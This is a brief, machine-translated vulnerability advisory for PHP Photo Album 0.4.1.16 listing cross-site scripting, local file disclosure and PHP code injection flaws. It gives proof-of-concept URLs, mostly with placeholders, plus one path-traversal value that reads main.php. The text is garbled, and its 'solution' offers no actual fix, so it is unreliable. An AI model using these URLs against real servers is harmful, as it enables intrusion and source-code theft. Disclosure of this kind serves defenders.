PHP Photo Album & lt; = (0.4.1.16) Multiple leakage defects and repair

 

Title: PHP Photo Album <= (0.4.1.16) Multiple Disclosure Vulnerabilities

Program name: [PHP Photo Album]

Author: BHG Security Center www.2cto.com black-hg.org

Software address: [http://www.phpalbum.net/dw]

Version: [0.4.1.16]

Level: High Risk

Test Platform: [linux + apache]

Overview: Given the vulnerability you want to read files on

Server must have access

 

+ ----------------------- +

| Cross Site scripting |

+ ----------------------- +

 

The vulnerable code is located in/www/main. php? Cmd = imageview & var1 = [XSS]

 

 

Proof:

-----------------

 

 

~ PoC: http://www.bkjia.com/phpAlbum/main. php? Cmd = imageview & var1 = [XSS]

 

~ Poc 2

 

Http://www.bkjia.com/phpAlbum/main. php? Cmd = albumnew & keyword = [XSS]

 

+ ---------------------- +

| Download/Source Code |

+ ---------------------- +

 

The vulnerable code is located in/www/main. php

 

Proof:

-----------------

 

~ PoC: http://www.bkjia.com/phpAlbum/main. php? Cmd = image & var1 = [LFD]

 

~ PoC: http://www.bkjia.com/phpAlbum/main. php? Cmd = image & var1 = ../main. php

 

~ PoC 2: http://www.bkjia.com/main. php? Cmd = themeimage & var1 = [LFD]

 

# Important Notes:

 

Php files from source to display (Veiw Page Source) your browser

 

 

+ -------------------- +

| PHP Code Injection |

+ -------------------- +

 

The vulnerable code is located in/www/main. php

 

124: Array

125 :(

126: [0] => cmd = phpinfo

127 :)

 

 

Proof of Concept:

-----------------

 

~ PoC: http://www.bkjia.com/phpAlbum/main. php? Cmd = phpinfo

 

~ PoC: The http://www.bkjia.com/demo3/main. php? Keyword = hack & cmd = phpinfo

 

~ PoC 2 http://www.bkjia.com/main. php? Cmd = setquality & var1 = [PHP Code Injection]

 

 

Solution: strengthen security awareness.

========================================================== === [End] ============================================== ==============